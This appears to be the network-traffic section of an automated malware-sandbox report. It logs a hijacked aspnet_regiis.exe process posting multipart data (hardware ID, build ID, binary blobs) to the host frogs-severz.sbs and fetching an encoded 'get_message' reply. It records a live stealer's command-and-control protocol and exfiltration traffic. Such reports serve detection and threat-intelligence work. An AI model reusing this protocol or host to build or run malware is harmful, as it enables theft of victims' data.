                                                                  2024-11-23 09:25:06 UTC1369INData Raw: 38 30 31 0d 0a 41 6b 34 52 64 5a 49 79 64 50 72 32 2f 63 45 4e 74 4c 76 59 4b 37 4a 63 58 68 34 71 35 6a 6b 34 63 68 51 6c 59 58 57 5a 57 43 68 79 65 7a 53 51 70 6e 66 31 33 43 42 71 31 50 7a 77 6d 70 7a 61 5a 62 6f 35 4b 68 35 58 33 65 30 47 6f 37 5a 67 39 62 6d 49 4b 44 49 37 41 50 52 7a 46 7a 57 71 51 42 7a 41 71 45 4f 75 71 43 74 53 58 46 38 35 6e 74 66 39 33 59 64 78 51 56 4f 31 57 64 67 49 6b 36 71 67 39 48 4d 58 70 61 70 47 6a 43 41 73 41 55 35 4a 72 39 4e 38 62 6d 2f 37 6b 68 67 63 41 76 48 42 67 4d 47 4d 37 65 79 6e 57 7a 44 31 45 78 4f 78 6e 75 4b 6f 70 42 30 67 62 6a 2f 4a 4e 47 69 71 57 6d 39 54 50 31 32 48 41 4d 54 68 64 4b 71 4c 4b 71 4f 4b 42 4d 42 7a 4e 4e 44 50 45 6f 6a 30 66 44 4f 35 72 4d 71 6e 47 61 76 61 72 75 4d 5a 32 66 62 6b 55 41
                                                                  Data Ascii: 801Ak4RdZIydPr2/cENtLvYK7JcXh4q5jk4chQlYXWZWChyezSQpnf13CBq1PzwmpzaZbo5Kh5X3e0Go7Zg9bmIKDI7APRzFzWqQBzAqEOuqCtSXF85ntf93YdxQVO1WdgIk6qg9HMXpapGjCAsAU5Jr9N8bm/7khgcAvHBgMGM7eynWzD1ExOxnuKopB0gbj/JNGiqWm9TP12HAMThdKqLKqOKBMBzNNDPEoj0fDO5rMqnGavaruMZ2fbkUA
                                                                  2024-11-23 09:25:06 UTC687INData Raw: 54 45 63 71 4a 64 47 33 64 2f 44 50 39 2f 73 6e 7a 69 42 72 58 49 6a 47 69 4e 74 4a 4c 51 5a 4e 44 52 62 77 4a 4f 43 78 6a 59 7a 49 74 31 2b 58 5a 4a 4f 54 41 63 2f 79 37 4d 66 59 70 46 76 49 4c 31 4a 61 69 77 6f 75 42 32 78 63 34 73 49 31 73 4c 55 72 65 42 6c 44 4c 68 41 55 6c 33 50 45 4b 76 64 73 78 47 31 55 58 38 6b 76 38 2b 79 4f 44 37 76 69 50 4d 6b 58 68 46 54 6c 6f 41 78 4d 4c 45 4a 2b 45 58 53 54 5a 2f 43 4f 34 2b 6a 31 54 48 51 70 72 38 6d 47 61 54 76 61 76 34 52 4e 44 4f 59 67 56 54 4a 47 61 33 67 6f 38 79 72 56 6b 33 54 30 6b 5a 38 6a 61 4c 56 4e 56 46 36 6f 4b 69 4a 63 57 4b 37 4b 59 78 37 4a 45 68 48 52 68 43 47 4b 4f 50 69 6a 75 6d 57 52 67 38 53 52 6e 74 4f 34 78 4a 68 45 76 6b 78 4f 30 39 7a 2f 33 73 36 6d 43 54 68 7a 46 58 41 30 38 4c 77
                                                                  Data Ascii: TEcqJdG3d/DP9/snziBrXIjGiNtJLQZNDRbwJOCxjYzIt1+XZJOTAc/y7MfYpFvIL1JaiwouB2xc4sI1sLUreBlDLhAUl3PEKvdsxG1UX8kv8+yOD7viPMkXhFTloAxMLEJ+EXSTZ/CO4+j1THQpr8mGaTvav4RNDOYgVTJGa3go8yrVk3T0kZ8jaLVNVF6oKiJcWK7KYx7JEhHRhCGKOPijumWRg8SRntO4xJhEvkxO09z/3s6mCThzFXA08Lw


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  3192.168.2.449737104.21.88.2504437728C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-23 09:25:08 UTC278OUTPOST /api HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Content-Type: multipart/form-data; boundary=PIXVMC0RVNH46C
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                  Content-Length: 18146
                                                                  Host: frogs-severz.sbs
                                                                  2024-11-23 09:25:08 UTC15331OUTData Raw: 2d 2d 50 49 58 56 4d 43 30 52 56 4e 48 34 36 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 35 39 30 30 36 32 31 37 38 44 32 44 45 41 33 46 46 31 43 36 33 33 33 33 32 31 46 43 44 44 39 0d 0a 2d 2d 50 49 58 56 4d 43 30 52 56 4e 48 34 36 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 50 49 58 56 4d 43 30 52 56 4e 48 34 36 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 62 38 62 62 38 36 30 65 31 65 65 32 0d 0a 2d 2d 50
                                                                  Data Ascii: --PIXVMC0RVNH46CContent-Disposition: form-data; name="hwid"6590062178D2DEA3FF1C6333321FCDD9--PIXVMC0RVNH46CContent-Disposition: form-data; name="pid"2--PIXVMC0RVNH46CContent-Disposition: form-data; name="lid"HpOoIh--b8bb860e1ee2--P
                                                                  2024-11-23 09:25:08 UTC2815OUTData Raw: 88 dd e0 cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77
                                                                  Data Ascii: d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!w
                                                                  2024-11-23 09:25:10 UTC1010INHTTP/1.1 200 OK
                                                                  Date: Sat, 23 Nov 2024 09:25:10 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Set-Cookie: PHPSESSID=ju7mhf50ho716rosrigjho4ouq; expires=Wed, 19-Mar-2025 03:11:47 GMT; Max-Age=9999999; path=/
                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                  Pragma: no-cache
                                                                  cf-cache-status: DYNAMIC
                                                                  vary: accept-encoding
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iibSEQHcEZ9NOUBf56L%2Bqeq7dD3GbQcl780O2RLu4dDu9IsWcD9gUhIplVBj8SdVickW5zTTFBbxRgr2hTXgxzrbEb6NZRytEtZWsh3QPGF%2FtNPSwpDXqkse0YGMs43mRW9M"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8e701c389bccc448-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1458&sent=14&recv=21&lost=0&retrans=0&sent_bytes=2839&recv_bytes=19104&delivery_rate=1926121&cwnd=226&unsent_bytes=0&cid=b8db1a598a82b939&ts=1777&x=0"
                                                                  2024-11-23 09:25:10 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                  Data Ascii: eok 8.46.123.75
                                                                  2024-11-23 09:25:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  4192.168.2.449740104.21.88.2504437728C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-23 09:25:11 UTC278OUTPOST /api HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Content-Type: multipart/form-data; boundary=1EJD49M7KDWLPUQ
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                  Content-Length: 8773
                                                                  Host: frogs-severz.sbs
                                                                  2024-11-23 09:25:11 UTC8773OUTData Raw: 2d 2d 31 45 4a 44 34 39 4d 37 4b 44 57 4c 50 55 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 35 39 30 30 36 32 31 37 38 44 32 44 45 41 33 46 46 31 43 36 33 33 33 33 32 31 46 43 44 44 39 0d 0a 2d 2d 31 45 4a 44 34 39 4d 37 4b 44 57 4c 50 55 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 31 45 4a 44 34 39 4d 37 4b 44 57 4c 50 55 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 62 38 62 62 38 36 30 65 31 65 65 32 0d 0a
                                                                  Data Ascii: --1EJD49M7KDWLPUQContent-Disposition: form-data; name="hwid"6590062178D2DEA3FF1C6333321FCDD9--1EJD49M7KDWLPUQContent-Disposition: form-data; name="pid"2--1EJD49M7KDWLPUQContent-Disposition: form-data; name="lid"HpOoIh--b8bb860e1ee2
                                                                  2024-11-23 09:25:12 UTC1013INHTTP/1.1 200 OK
                                                                  Date: Sat, 23 Nov 2024 09:25:12 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Set-Cookie: PHPSESSID=vgjpn2mt8bsl7p3dvft9cdc0d0; expires=Wed, 19-Mar-2025 03:11:51 GMT; Max-Age=9999999; path=/
                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                  Pragma: no-cache
                                                                  cf-cache-status: DYNAMIC
                                                                  vary: accept-encoding
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G%2BpkY32Ju95ESM3hLmw0OsXCZ%2FwK4vYr%2FzZ%2F1yDU77TbAKrS5xCOLRyXO2tnTJGLmitYbxInKlxy1HcJfJJH7f6B5ItNl2ghG07ERAeXhRm4tBkozOElUJFW%2BS88q8XUCadR"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8e701c4c78284337-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1783&sent=7&recv=15&lost=0&retrans=0&sent_bytes=2839&recv_bytes=9709&delivery_rate=1657207&cwnd=215&unsent_bytes=0&cid=32cf5c095307225a&ts=783&x=0"
                                                                  2024-11-23 09:25:12 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                  Data Ascii: eok 8.46.123.75
                                                                  2024-11-23 09:25:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  5192.168.2.449742104.21.88.2504437728C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-23 09:25:13 UTC274OUTPOST /api HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Content-Type: multipart/form-data; boundary=SEPOOODGTK
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                  Content-Length: 20396
                                                                  Host: frogs-severz.sbs
                                                                  2024-11-23 09:25:13 UTC15331OUTData Raw: 2d 2d 53 45 50 4f 4f 4f 44 47 54 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 35 39 30 30 36 32 31 37 38 44 32 44 45 41 33 46 46 31 43 36 33 33 33 33 32 31 46 43 44 44 39 0d 0a 2d 2d 53 45 50 4f 4f 4f 44 47 54 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 53 45 50 4f 4f 4f 44 47 54 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 62 38 62 62 38 36 30 65 31 65 65 32 0d 0a 2d 2d 53 45 50 4f 4f 4f 44 47 54 4b 0d 0a 43
                                                                  Data Ascii: --SEPOOODGTKContent-Disposition: form-data; name="hwid"6590062178D2DEA3FF1C6333321FCDD9--SEPOOODGTKContent-Disposition: form-data; name="pid"3--SEPOOODGTKContent-Disposition: form-data; name="lid"HpOoIh--b8bb860e1ee2--SEPOOODGTKC
                                                                  2024-11-23 09:25:13 UTC5065OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b dc 40
                                                                  Data Ascii: lrQMn 64F6(X&7~`aO@
                                                                  2024-11-23 09:25:14 UTC1017INHTTP/1.1 200 OK
                                                                  Date: Sat, 23 Nov 2024 09:25:14 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Set-Cookie: PHPSESSID=9a2ec3n5k2b00v4gdo5flqlmi2; expires=Wed, 19-Mar-2025 03:11:53 GMT; Max-Age=9999999; path=/
                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                  Pragma: no-cache
                                                                  cf-cache-status: DYNAMIC
                                                                  vary: accept-encoding
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l2TyZmLrqlk%2BAxUyMDydoXu5yzZSPph1AC0nyVvjz0kf%2BpDfGVJxDtnPhxgN19g0howHjpAi1I1Rr%2Bg6%2FvguHLNzJKlBD47oS%2FFhtwOsI1tF84tz945EJVOqT9dvumZ%2FAaPn"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8e701c5abf6f8ca2-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1833&sent=14&recv=23&lost=0&retrans=0&sent_bytes=2839&recv_bytes=21350&delivery_rate=1572428&cwnd=252&unsent_bytes=0&cid=1a82acb6cab61812&ts=877&x=0"
                                                                  2024-11-23 09:25:14 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                  Data Ascii: eok 8.46.123.75
                                                                  2024-11-23 09:25:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  6192.168.2.449744104.21.88.2504437728C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-23 09:25:16 UTC272OUTPOST /api HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Content-Type: multipart/form-data; boundary=69WLIBOBD
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                  Content-Length: 1248
                                                                  Host: frogs-severz.sbs
                                                                  2024-11-23 09:25:16 UTC1248OUTData Raw: 2d 2d 36 39 57 4c 49 42 4f 42 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 35 39 30 30 36 32 31 37 38 44 32 44 45 41 33 46 46 31 43 36 33 33 33 33 32 31 46 43 44 44 39 0d 0a 2d 2d 36 39 57 4c 49 42 4f 42 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 36 39 57 4c 49 42 4f 42 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 62 38 62 62 38 36 30 65 31 65 65 32 0d 0a 2d 2d 36 39 57 4c 49 42 4f 42 44 0d 0a 43 6f 6e 74 65
                                                                  Data Ascii: --69WLIBOBDContent-Disposition: form-data; name="hwid"6590062178D2DEA3FF1C6333321FCDD9--69WLIBOBDContent-Disposition: form-data; name="pid"1--69WLIBOBDContent-Disposition: form-data; name="lid"HpOoIh--b8bb860e1ee2--69WLIBOBDConte
                                                                  2024-11-23 09:25:17 UTC1004INHTTP/1.1 200 OK
                                                                  Date: Sat, 23 Nov 2024 09:25:17 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Set-Cookie: PHPSESSID=dpnnorkj6qgrc0oklj0jihh3ud; expires=Wed, 19-Mar-2025 03:11:56 GMT; Max-Age=9999999; path=/
                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                  Pragma: no-cache
                                                                  cf-cache-status: DYNAMIC
                                                                  vary: accept-encoding
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZNBRmY9CY1aUbF3SCf4p5rSpfATm3tvuml32peungvFEhiGPNCSNx55itHPWbfNXrvTuhzi85%2BFQp37ZAuFOEt9CbSWg3QVthKcWjStQL6kc1Yul0R9dWdH7CXcxzxgcVOrN"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8e701c6bfce37295-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1846&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=2156&delivery_rate=1599123&cwnd=222&unsent_bytes=0&cid=b3e0ec4fb963377b&ts=719&x=0"
                                                                  2024-11-23 09:25:17 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                  Data Ascii: eok 8.46.123.75
                                                                  2024-11-23 09:25:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  7192.168.2.449747104.21.88.2504437728C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-23 09:25:18 UTC280OUTPOST /api HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Content-Type: multipart/form-data; boundary=QE9559A41CV3RM9L5
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                  Content-Length: 1140
                                                                  Host: frogs-severz.sbs
                                                                  2024-11-23 09:25:18 UTC1140OUTData Raw: 2d 2d 51 45 39 35 35 39 41 34 31 43 56 33 52 4d 39 4c 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 35 39 30 30 36 32 31 37 38 44 32 44 45 41 33 46 46 31 43 36 33 33 33 33 32 31 46 43 44 44 39 0d 0a 2d 2d 51 45 39 35 35 39 41 34 31 43 56 33 52 4d 39 4c 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 51 45 39 35 35 39 41 34 31 43 56 33 52 4d 39 4c 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 62 38 62 62 38 36 30 65
                                                                  Data Ascii: --QE9559A41CV3RM9L5Content-Disposition: form-data; name="hwid"6590062178D2DEA3FF1C6333321FCDD9--QE9559A41CV3RM9L5Content-Disposition: form-data; name="pid"1--QE9559A41CV3RM9L5Content-Disposition: form-data; name="lid"HpOoIh--b8bb860e
                                                                  2024-11-23 09:25:20 UTC1009INHTTP/1.1 200 OK
                                                                  Date: Sat, 23 Nov 2024 09:25:19 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Set-Cookie: PHPSESSID=au6rlnttdknii2q4fn0bm3umna; expires=Wed, 19-Mar-2025 03:11:58 GMT; Max-Age=9999999; path=/
                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                  Pragma: no-cache
                                                                  cf-cache-status: DYNAMIC
                                                                  vary: accept-encoding
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1t52CmE6Vl%2FalbdPYj5ZKZhaRWDggWHL720XwIErYOH%2B67pCtdQRq3QWD2MqLgYvrv9Gm0zxdfBrN39EYcSJfCSfi5QXNMm0o6DHkMbl1PPjvvnu%2BHhK6UnC2tkZvEOc4OXK"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8e701c7968e7de95-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1447&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=2056&delivery_rate=1858688&cwnd=225&unsent_bytes=0&cid=0e1ac8fd1cc98cf8&ts=1418&x=0"
                                                                  2024-11-23 09:25:20 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                  Data Ascii: eok 8.46.123.75
                                                                  2024-11-23 09:25:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  8192.168.2.449749104.21.88.2504437728C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-23 09:25:21 UTC265OUTPOST /api HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                  Content-Length: 121
                                                                  Host: frogs-severz.sbs
                                                                  2024-11-23 09:25:21 UTC121OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 62 38 62 62 38 36 30 65 31 65 65 32 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61 26 68 77 69 64 3d 36 35 39 30 30 36 32 31 37 38 44 32 44 45 41 33 46 46 31 43 36 33 33 33 33 32 31 46 43 44 44 39
                                                                  Data Ascii: act=get_message&ver=4.0&lid=HpOoIh--b8bb860e1ee2&j=b9abc76ce53b6fc3a03566f8f764f5ea&hwid=6590062178D2DEA3FF1C6333321FCDD9
                                                                  2024-11-23 09:25:22 UTC1008INHTTP/1.1 200 OK
                                                                  Date: Sat, 23 Nov 2024 09:25:21 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Set-Cookie: PHPSESSID=ilq35dbe142hiadeudefqsn5vv; expires=Wed, 19-Mar-2025 03:12:00 GMT; Max-Age=9999999; path=/
                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                  Pragma: no-cache
                                                                  cf-cache-status: DYNAMIC
                                                                  vary: accept-encoding
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=000RLs2t47BWAsmxWueGPTO8o1x5eMnRpJnc87GJG4HN7RdwbbvVFyGIv02ssCvW2IjPUjkwMIcQtg1Y4Dai0hNrND7G42F%2FL5HDojj%2F6bbYZfedrhdF6IXMF%2FXqPqDbWb10"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8e701c8ac91b7c82-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1794&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1022&delivery_rate=1604395&cwnd=202&unsent_bytes=0&cid=01e161c638d30706&ts=709&x=0"
                                                                  2024-11-23 09:25:22 UTC54INData Raw: 33 30 0d 0a 75 64 58 2b 4f 38 47 74 6a 31 58 72 48 42 58 37 4d 34 61 7a 73 4d 33 2b 4f 69 77 66 2f 38 61 45 44 75 73 61 6e 61 35 51 7a 55 6e 69 69 41 3d 3d 0d 0a
                                                                  Data Ascii: 30udX+O8Gtj1XrHBX7M4azsM3+Oiwf/8aEDusana5QzUniiA==
                                                                  2024-11-23 09:25:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Click to jump to process

                                                                  Click to jump to process

